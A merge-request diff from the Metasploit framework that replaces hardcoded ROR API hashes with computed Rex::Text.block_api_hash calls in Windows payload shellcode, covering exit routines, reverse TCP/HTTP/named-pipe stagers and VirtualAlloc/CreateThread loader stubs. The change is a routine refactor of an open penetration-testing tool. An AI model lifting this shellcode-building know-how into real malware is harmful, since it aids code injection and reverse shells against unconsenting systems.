Merge pull request #19609 from dledda-r7/remove-hardcoded-blockapi-hash

Remove hardcoded blockapi hashes

lib/msf/core/payload/windows.rb

@@ -21,15 +21,15 @@ module Msf::Payload::Windows
 
   #
   # ROR hash associations for some of the exit technique routines.
-  #
+
   @@exit_types =
     {
       nil       => 0,          # Default to nothing
       ''        => 0,          # Default to nothing
-      'seh'     => 0xEA320EFE, # SetUnhandledExceptionFilter
-      'thread'  => 0x0A2A1DE0, # ExitThread
-      'process' => 0x56A2B5F0, # ExitProcess
-      'none'    => 0x5DE2C5AA  # GetLastError
+      'seh'     => Rex::Text.block_api_hash("kernel32.dll", "SetUnhandledExceptionFilter").to_i(16), # SetUnhandledExceptionFilter
+      'thread'  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
+      'process' => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
+      'none'    => Rex::Text.block_api_hash("kernel32.dll", "GetLastError").to_i(16)  # GetLastError
     }
 
   #

lib/msf/core/payload/windows/exitfunk.rb

@@ -33,13 +33,13 @@ def asm_exitfunk(opts={})
     when 'thread'
       asm << %Q^
         mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
-        push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+        push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
         call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
         cmp al, 6              ; If we are not running on Windows Vista, 2008 or 7
         jl exitfunk_goodbye    ; Then just call the exit function...
         cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
         jne exitfunk_goodbye   ;
-        mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+        mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}     ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
       exitfunk_goodbye:        ; We now perform the actual call to the exit function
         push.i8 0              ; push the exit function parameter
         push ebx               ; push the hash of the exit function

lib/msf/core/payload/windows/reverse_http.rb

@@ -442,7 +442,7 @@ def asm_reverse_http(opts={})
     else
       asm << %Q^
     failure:
-      push 0x56A2B5F0        ; hardcoded to exitprocess for size
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
       call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_named_pipe.rb

@@ -147,7 +147,7 @@ def asm_reverse_named_pipe(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_tcp.rb

@@ -201,7 +201,7 @@ def asm_reverse_tcp(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_tcp_dns.rb

@@ -142,7 +142,7 @@ def asm_reverse_tcp_dns(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_udp.rb

@@ -129,7 +129,7 @@ def asm_reverse_udp(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_win_http.rb

@@ -476,7 +476,7 @@ def asm_reverse_winhttp(opts={})
       else
         asm << %Q^
       failure:
-        push 0x56A2B5F0        ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
         ^
       end

lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb

@@ -59,8 +59,8 @@ def generate_reverse_named_pipe(opts={})
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
       call start              ; Call start, this pushes the address of 'api_call' onto the stack.
       #{asm_block_api}
-      start:
-        pop rbp               ; block API pointer
+     start:
+      pop rbp                 ; block API pointer
       #{asm_reverse_named_pipe(opts)}
     ^
     Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
@@ -145,7 +145,7 @@ def asm_reverse_named_pipe(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       ^
     end

lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb

@@ -173,7 +173,7 @@ def asm_reverse_tcp(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0       ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       ^
     end

lib/msf/util/exe.rb

@@ -1836,15 +1836,15 @@ def self.win32_rwx_exec(code)
     ; Note: Execution is not expected to (successfully) continue past this block
 
     exitfunk:
-      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
-      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}    ; The EXITFUNK as specified by user...
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}        ; hash( "kernel32.dll", "GetVersion" )
       mov eax, ebp
       call eax               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye             ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye      ;
-      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+      mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
     goodbye:                 ; We now perform the actual call to the exit function
       push byte 0            ; push the exit function parameter
       push ebx               ; push the hash of the exit function
@@ -1867,7 +1867,7 @@ def self.win32_rwx_exec(code)
       push 0x1000            ; MEM_COMMIT
       push esi               ; Push the length value of the wrapped code block
       push byte 0            ; NULL as we dont care where the allocation is.
-      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}        ; hash( "kernel32.dll", "VirtualAlloc" )
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
       mov ebx, eax           ; Store allocated address in ebx
@@ -1946,14 +1946,14 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
     ; Note: Execution is not expected to (successfully) continue past this block
 
     exitfunk:
-      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
-      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}    ; The EXITFUNK as specified by user...
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}        ; hash( "kernel32.dll", "GetVersion" )
       call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye       ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye      ;
-      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+      mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
     goodbye:                 ; We now perform the actual call to the exit function
       push byte 0            ; push the exit function parameter
       push ebx               ; push the hash of the exit function
@@ -1977,7 +1977,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
       push 0x1000            ; MEM_COMMIT
       push esi               ; Push the length value of the wrapped code block
       push byte 0            ; NULL as we dont care where the allocation is.
-      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}        ; hash( "kernel32.dll", "VirtualAlloc" )
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
       mov ebx, eax           ; Store allocated address in ebx
@@ -2002,7 +2002,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
       push ebx               ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
       push eax               ; SIZE_T dwStackSize (0 for default)
       push eax               ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
-      push 0x160D6838        ; hash( "kernel32.dll", "CreateThread" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateThread')}        ; hash( "kernel32.dll", "CreateThread" )
       call ebp               ; Spawn payload thread
 
       pop eax                ; Skip